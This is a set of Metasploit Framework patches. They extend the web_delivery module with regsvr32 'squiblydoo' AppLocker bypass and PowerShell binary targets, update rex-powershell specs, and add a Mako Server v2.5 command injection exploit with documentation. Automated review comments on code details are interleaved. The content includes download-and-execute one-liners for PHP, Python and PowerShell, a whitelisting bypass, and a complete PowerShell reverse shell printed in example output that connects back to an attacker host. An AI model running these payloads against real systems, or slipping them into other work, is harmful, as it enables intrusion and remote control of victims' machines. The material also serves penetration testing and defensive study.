custom binaries to be served up to be downloaded/executed. + This module quickly fires up a web server that serves a payload. + The provided command will start the specified scripting language interpreter and then download and execute the + payload. The main purpose of this module is to quickly establish a session on a target + machine when the attacker has to manually type in the command himself, e.g. Command Injection, + RDP Session, Local Access or maybe Remote Command Exec. 
This attack vector does not + write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. When using either of the PSH targets, ensure the + payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute + x86 payloads on x64 machines. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! - 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) - 'Trenton Ivey', # AppLocker MSF Module (kn0) - 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features + 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! ], 'DefaultOptions' => { @@ -51,11 +38,10 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], - ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], + ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] ], 'Platform' => %w(python php win), 'Targets' => 
@@ -71,117 +57,45 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] - }], - ['Regsvr32', { - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64] - }], - ['PSH (Binary)', { - 'Platform' => 'win', - 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) - - register_advanced_options( - [ - OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), - OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), - OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), - ], self.class - ) end - - def primer - php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") - python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") - regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) - - print_status("Run the following command on the target machine:") - case target.name - when 'PHP' - print_line("#{php}") - when 'Python' - print_line("#{python}") - when 'PSH' - psh = gen_psh("#{get_uri}", "string") - print_line("#{psh}") - when 'Regsvr32' - print_line("#{regsvr}") - when 'PSH (Binary)' - psh = gen_psh("#{get_uri}", "download") - print_line("#{psh}") - end - end - - def on_request_uri(cli, _request) - if _request.raw_uri =~ /\.sct$/ - psh = gen_psh("#{get_uri}", "string") - data = gen_sct_file(psh) - elsif target.name.include? 'PSH (Binary)' - data = generate_payload_exe - elsif target.name.include? 'PSH' or target.name.include? 'Regsvr32' + print_status('Delivering Payload') + if target.name.include? 
'PSH' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded}) - end - - if _request.raw_uri =~ /\.sct$/ - print_status("Handling .sct Request") - send_response(cli, data, 'Content-Type' => 'text/plain') - else - print_status("Delivering Payload") - send_response(cli, data, 'Content-Type' => 'application/octet-stream') + data = %Q(#{payload.encoded} ) end + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - - def gen_psh(url, *method) + def primer + url = get_uri + print_status('Run the following command on the target machine:') + case target.name + when 'PHP' + print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") + when 'Python' + print_line('Python:') + print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") + when 'PSH' ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - - if method.include? 'string' - download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) - else - # Random filename to use, if there isn't anything set - random = "#{rand_text_alphanumeric 8}.exe" - - # Set filename (Use random filename if empty) - filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] - - # Set path (Use %TEMP% if empty) - path = datastore['BinaryEXE-PATH'].blank? ? 
"$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') - - # Join Path and Filename - file = %Q(echo (#{path}+'\\#(unknown)')) - - # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) - end - + download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) download_and_run = "#{ignore_cert}#{download_string}" - - # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end - - - def rand_class_id - "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" - end - - - def gen_sct_file(command) - %{} + print_line generate_psh_command_line( + noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) + end end end diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index 1143b831a5..bb12511682 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,9 +8,6 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer - include Msf::Module::Deprecated - - deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From f2cba8d920485059a1cdfb1a00dd6b8b68e1226e Mon Sep 17 00:00:00 2001 
From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:29:11 -0500 Subject: [PATCH 052/254] Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary) This restores the original PR --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 154 ++++++++++++++---- .../misc/regsvr32_applocker_bypass_server.rb | 3 + 3 files changed, 124 insertions(+), 35 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 6accc821ad..7bf217c2c3 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 9adc1dacb4..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,6 +8,7 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking + include Msf::Exploit::EXE include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer 
@@ -15,22 +16,34 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Script Web Delivery', 'Description' => %q( - This module quickly fires up a web server that serves a payload. - The provided command will start the specified scripting language interpreter and then download and execute the - payload. The main purpose of this module is to quickly establish a session on a target - machine when the attacker has to manually type in the command himself, e.g. Command Injection, - RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not - write to disk so it is less likely to trigger AV solutions and will allow privilege - escalations supplied by Meterpreter. When using either of the PSH targets, ensure the - payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute - x86 payloads on x64 machines. + This module quickly fires up a web server that serves a payload. + The provided command which will allow for a payload to download and execute. + It will do it either specified scripting language interpreter or "squiblydoo" via regsvr32.exe + for bypassing application whitelisting. The main purpose of this module is to quickly establish + a session on a target machine when the attacker has to manually type in the command: + e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Execution. + This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege + escalations supplied by Meterpreter. + + When using either of the PSH targets, ensure the payload architecture matches the target computer + or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. + + Regsvr32 uses "squiblydoo" technique for bypassing application whitelisting. + The signed Microsoft binary file, Regsvr32, is able to request an .sct file and then execute the included + PowerShell command inside of it. 
Both web requests (i.e., the .sct file and PowerShell download/execute) + can occur on the same port. + + "PSH (Binary)" will write a file to the disk, allowing for custom binaries to be served up to be downloaded/executed. ), 'License' => MSF_LICENSE, 'Author' => [ 'Andrew Smith "jakx" ', 'Ben Campbell', - 'Chris Campbell' # @obscuresec - Inspiration n.b. no relation! + 'Chris Campbell', # @obscuresec - Inspiration n.b. no relation! + 'Casey Smith', # AppLocker bypass research and vulnerability discovery (@subTee) + 'Trenton Ivey', # AppLocker MSF Module (kn0) + 'g0tmi1k', # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features ], 'DefaultOptions' => { @@ -38,10 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote }, 'References' => [ - ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], - ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], + ['URL', 'https://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'], + ['URL', 'https://www.pentestgeek.com/2013/07/19/invoke-shellcode/'], ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'], - ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'] + ['URL', 'https://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html'], + ['URL', 'https://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html'], ], 'Platform' => %w(python php win), 'Targets' => 
@@ -57,45 +71,117 @@ class MetasploitModule < Msf::Exploit::Remote ['PSH', { 'Platform' => 'win', 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['Regsvr32', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] + }], + ['PSH (Binary)', { + 'Platform' => 'win', + 'Arch' => [ARCH_X86, ARCH_X64] }] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 19 2013' )) + + register_advanced_options( + [ + OptBool.new('PSH-Proxy', [ true, 'PSH - Use the system proxy', true ]), + OptString.new('PSHBinary-PATH', [ false, 'PSH (Binary) - The folder to store the file on the target machine (Will be %TEMP% if left blank)', '' ]), + OptString.new('PSHBinary-FILENAME', [ false, 'PSH (Binary) - The filename to use (Will be random if left blank)', '' ]), + ], self.class + ) end + + def primer + php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));") + python = %Q(python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}');exec(r.read());") + regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll) + + print_status("Run the following command on the target machine:") + case target.name + when 'PHP' + print_line("#{php}") + when 'Python' + print_line("#{python}") + when 'PSH' + psh = gen_psh("#{get_uri}", "string") + print_line("#{psh}") + when 'Regsvr32' + print_line("#{regsvr}") + when 'PSH (Binary)' + psh = gen_psh("#{get_uri}", "download") + print_line("#{psh}") + end + end + + def on_request_uri(cli, _request) - print_status('Delivering Payload') - if target.name.include? 'PSH' + if _request.raw_uri =~ /\.sct$/ + psh = gen_psh("#{get_uri}", "string") + data = gen_sct_file(psh) + elsif target.name.include? 'PSH (Binary)' + data = generate_payload_exe + elsif target.name.include? 'PSH' or target.name.include? 
'Regsvr32' data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true ) else - data = %Q(#{payload.encoded} ) + data = %Q(#{payload.encoded}) + end + + if _request.raw_uri =~ /\.sct$/ + print_status("Handling .sct Request") + send_response(cli, data, 'Content-Type' => 'text/plain') + else + print_status("Delivering Payload") + send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - send_response(cli, data, 'Content-Type' => 'application/octet-stream') end - def primer - url = get_uri - print_status('Run the following command on the target machine:') - case target.name - when 'PHP' - print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"") - when 'Python' - print_line('Python:') - print_line("python -c \"import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{url}');exec(r.read());\"") - when 'PSH' + + def gen_psh(url, *method) ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl - download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url) + + if method.include? 'string' + download_string = datastore['PSH-Proxy'] ? (Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(url)) : (Rex::Powershell::PshMethods.download_and_exec_string(url)) + else + # Random filename to use, if there isn't anything set + random = "#{rand_text_alphanumeric 8}.exe" + + # Set filename (Use random filename if empty) + filename = datastore['BinaryEXE-FILENAME'].blank? ? random : datastore['BinaryEXE-FILENAME'] + + # Set path (Use %TEMP% if empty) + path = datastore['BinaryEXE-PATH'].blank? ? 
"$env:temp" : %Q('#{datastore['BinaryEXE-PATH']}') + + # Join Path and Filename + file = %Q(echo (#{path}+'\\#(unknown)')) + + # Generate download PowerShell command + download_string = Rex::Powershell::PshMethods.download_run(url, file}) + end + download_and_run = "#{ignore_cert}#{download_string}" - print_line generate_psh_command_line( - noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) - end + + # Generate main PowerShell command + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) + end + + + def rand_class_id + "#{Rex::Text.rand_text_hex 8}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 4}-#{Rex::Text.rand_text_hex 12}" + end + + + def gen_sct_file(command) + %{} end end diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, From 43b67fe80bc79ffafa70e4784407054fbc4f3ed0 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 26 Oct 2017 15:01:53 -0500 Subject: [PATCH 053/254] remove errant bracket, formatting update --- Gemfile.lock | 4 ++-- modules/exploits/multi/script/web_delivery.rb | 7 ++----- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 572a93e651..69ab329926 100644 --- a/Gemfile.lock +++ b/Gemfile.lock 
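Review bot: `gen_psh` reads `datastore['BinaryEXE-FILENAME']` and `datastore['BinaryEXE-PATH']`, but the advanced options registered in `initialize` in this same hunk are `PSHBinary-FILENAME` and `PSHBinary-PATH`, so an operator's settings are never seen and the download branch always falls back to the random name under `$env:temp`; the two lookups should use the registered names, e.g. `filename = datastore['PSHBinary-FILENAME'].blank? ? random : datastore['PSHBinary-FILENAME']`. As rendered here `gen_sct_file(command)` returns a bare `%{}` and never references `command`, which would serve an empty `.sct` body — if the template text was lost in rendering this is moot, otherwise the scriptlet needs to embed `command`. The `_request.raw_uri =~ /\.sct$/` check, used twice in `on_request_uri`, would be safer as `/\.sct\z/`, since `$` also matches before an embedded newline; the underscore prefix on `_request` also signals an unused parameter that is in fact read.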
@@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.73) + rex-powershell (< 0.1.78) rex-random_identifier rex-registry rex-rop_builder @@ -278,7 +278,7 @@ GEM rex-arch rex-ole (0.1.6) rex-text - rex-powershell (0.1.72) + rex-powershell (0.1.77) rex-random_identifier rex-text rex-random_identifier (0.1.4) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,16 +163,13 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#(unknown)')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) + download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end From cd755b05d5e7f904063793f0293e9248af4429a0 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 26 Oct 2017 15:03:10 -0500 Subject: [PATCH 054/254] update powershell specs for rex-powershell 0.1.77 --- .../cmd/windows/powershell_bind_tcp.rb | 2 +- .../cmd/windows/powershell_reverse_tcp.rb | 2 +- .../singles/windows/powershell_bind_tcp.rb | 2 +- .../singles/windows/powershell_reverse_tcp.rb | 2 +- .../windows/x64/powershell_bind_tcp.rb | 2 +- .../windows/x64/powershell_reverse_tcp.rb | 2 +- spec/lib/msf/core/exploit/powershell_spec.rb | 35 +++++++++---------- 7 files changed, 22 insertions(+), 25 deletions(-) diff --git a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb index b677a24fef..83e3bc0f93 100644 
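Review bot: The rewritten tail of `gen_psh` keeps an explicit `return` in front of the method's last expression; Ruby returns the final expression implicitly, so `generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run)` on its own is the idiomatic form and matches the neighbouring `rand_class_id`, which already relies on implicit return. `gen_psh` begins outside the hunk.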
--- a/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb index 2eb30f8fdd..48bcf2a81d 100644 --- a/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/reverse_tcp_ssl' module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Single include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/powershell_bind_tcp.rb b/modules/payloads/singles/windows/powershell_bind_tcp.rb index 9b7413ffef..caf3a2f68d 100644 --- a/modules/payloads/singles/windows/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/powershell_reverse_tcp.rb index f7a5dcab0c..beba1f83bc 100644 --- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec include Msf::Payload::Windows::Powershell diff --git a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb index 477f7c0961..face477a1b 100644 
--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp' ### module MetasploitModule - CachedSize = 1501 + CachedSize = 1518 include Msf::Payload::Windows::Exec_x64 include Rex::Powershell::Command diff --git a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb index e3bdaee025..5713b440c1 100644 --- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb +++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb @@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl' ### module MetasploitModule - CachedSize = 1509 + CachedSize = 1526 include Msf::Payload::Windows::Exec_x64 include Msf::Payload::Windows::Powershell diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index fbe38decdf..ef6b4ca487 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -313,14 +313,9 @@ RSpec.describe Msf::Exploit::Powershell do subject.datastore['Powershell::method'] = 'msil' subject.options.validate(subject.datastore) end - it 'should raise an exception' do - except = false - begin - subject.cmd_psh_payload(payload, arch) - rescue RuntimeError - except = true - end - expect(except).to be_truthy + it 'should generate a command line' do + code = subject.cmd_psh_payload(payload, arch) + expect(decompress(code).include?('System.Reflection.MethodInfo')).to be_truthy end end 
@@ -396,10 +391,10 @@ RSpec.describe Msf::Exploit::Powershell do end end - context 'when use single quotes' do - it 'should wrap in single quotes' do - code = subject.cmd_psh_payload(payload, arch, {:use_single_quotes => true}) - expect(code.include?(' -c \'')).to be_truthy + context 'when wrap double quotes' do + it 'should wrap in double quotes' do + code = subject.cmd_psh_payload(payload, arch, {:wrap_double_quotes => true}) + expect(code.include?(' -c "')).to be_truthy end end end @@ -449,7 +444,8 @@ RSpec.describe Msf::Exploit::Powershell do [:sta, true], [:noprofile, true], [:windowstyle, "hidden"], - [:command, "Z"] + [:command, "Z"], + [:wrap_double_quotes, true] ] permutations = (0..command_args.length).to_a.combination(2).map{|i,j| command_args[i...j]} @@ -464,20 +460,21 @@ RSpec.describe Msf::Exploit::Powershell do opts[:shorten] = false long_args = subject.generate_psh_args(opts) - opt_length = opts.length - 1 - expect(short_args).not_to be_nil expect(long_args).not_to be_nil - expect(short_args.count('-')).to eql opt_length - expect(long_args.count('-')).to eql opt_length expect(short_args[0]).not_to eql " " expect(long_args[0]).not_to eql " " expect(short_args[-1]).not_to eql " " expect(long_args[-1]).not_to eql " " if opts[:command] - expect(long_args[-10..-1]).to eql "-Command Z" - expect(short_args[-4..-1]).to eql "-c Z" + if opts[:wrap_double_quotes] + expect(long_args[-12..-1]).to eql "-Command \"Z\"" + expect(short_args[-6..-1]).to eql "-c \"Z\"" + else + expect(long_args[-10..-1]).to eql "-Command Z" + expect(short_args[-4..-1]).to eql "-c Z" + end end end end From 8613852ee8ef31f34229437ed108d20dadd0f267 Mon Sep 17 00:00:00 2001 
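Review bot: Removing the `short_args.count('-')` and `long_args.count('-')` expectations drops the only check that each option turns into exactly one switch; presumably they stopped holding because the new `[:wrap_double_quotes, true]` entry adds an option that emits no switch of its own. Keeping them with the count adjusted, e.g. `opt_length = opts.reject { |k, _| k == :wrap_double_quotes }.length - 1`, would preserve that coverage — worth confirming against what `generate_psh_args` actually emits. The `-12..-1` and `-6..-1` slices in the new branch are tied to the literal `Z` command and go stale silently if it changes; `expect(long_args).to end_with('-Command "Z"')` states the same thing without the offsets. The enclosing `it` block begins outside the hunk.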
From: Steven Patterson Date: Thu, 26 Oct 2017 23:29:11 -0400 Subject: [PATCH 055/254] Add Mako Server v2.5 command injection module/docs --- .../windows/http/makoserver_cmd_exec.md | 163 ++++++++++++++++++ .../windows/http/makoserver_cmd_exec.rb | 125 ++++++++++++++ 2 files changed, 288 insertions(+) create mode 100644 documentation/modules/exploit/windows/http/makoserver_cmd_exec.md create mode 100644 modules/exploits/windows/http/makoserver_cmd_exec.rb diff --git a/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md b/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md new file mode 100644 index 0000000000..207fc99c1e --- /dev/null +++ b/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md 
@@ -0,0 +1,163 @@ +## Description + + This module exploits a vulnerability found in Mako Server v2.5. + It's possible to inject arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Attacker input will be saved on the victims machine and can be executed by sending a GET request to manage.lsp. + + Based on the public PoC found here: https://blogs.securiteam.com/index.php/archives/3391 + +## Vulnerable Application + + [Mako Server](https://makoserver.net) is an application framework for designing web and IoT applications. + + This module has been verified against the following Mako Server versions for Windows XP SP3 and Windows 7 SP1 (x86/x64): + - v2.5 + + Links: + - [Windows installer](https://makoserver.net/download/mako.windows.x86.exe) + - [Windows download page](https://makoserver.net/download/windows) + - [Documentation](https://makoserver.net/documentation/manual/) + +## References for vulnerability + - https://blogs.securiteam.com/index.php/archives/3391 + - https://www.exploit-db.com/exploits/42683 + +## Verification Steps + + 1. Run the installer "mako.windows.x86" on a Windows 7 SP1 (x86/x64) target (with Powershell for this example to work) + 2. After installer finishes, double click the "Mako-Demo" shortcut on the desktop + 3. Start msfconsole on host + 4. Do: ```use exploit/windows/http/makoserver_cmd_exec``` + 5. Do: ```set RHOST ``` + 6. Do: ```set PAYLOAD cmd/windows/reverse_powershell``` + 7. Do: ```set LHOST ``` + 8. Do: ```exploit``` + 9. 
You should get a Windows command shell + +## Example Output +``` +msf > use exploit/windows/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... +[*] Command shell session 1 opened (10.10.10.2:4444 -> 10.10.10.3:49175) at 2017-10-26 21:23:59 -0400 + +Microsoft Windows +Copyright (c) 2009 Microsoft Corporation. All rights reserved. + +C:\Users\Smith\Downloads\MakoServer> + +``` + +## Example Verbose Output +``` +msf > use exploit/windows/http/makoserver_cmd_exec +msf exploit(makoserver_cmd_exec) > set RHOST 10.10.10.3 +RHOST => 10.10.10.3 +msf exploit(makoserver_cmd_exec) > set VERBOSE true +VERBOSE => true +msf exploit(makoserver_cmd_exec) > set PAYLOAD cmd/windows/reverse_powershell +PAYLOAD => cmd/windows/reverse_powershell +msf exploit(makoserver_cmd_exec) > set LHOST 10.10.10.2 +LHOST => 10.10.10.2 +msf exploit(makoserver_cmd_exec) > check + +[*] Trying to detect running Mako Server and necessary files... +[*] Mako Server save.lsp returns correct ouput. +[*] 10.10.10.3:80 The target appears to be vulnerable. +msf exploit(makoserver_cmd_exec) > exploit + +[*] Started reverse TCP handler on 10.10.10.2:4444 +[*] Sending payload to target... 
+[*] Now executing the following command: os.execute([[powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) {$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='10.10.10.2';$p='4444';$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};]]) +[*] Sending PUT request to save.lsp... +[*] Sending GET request to manage.lsp... +[*] 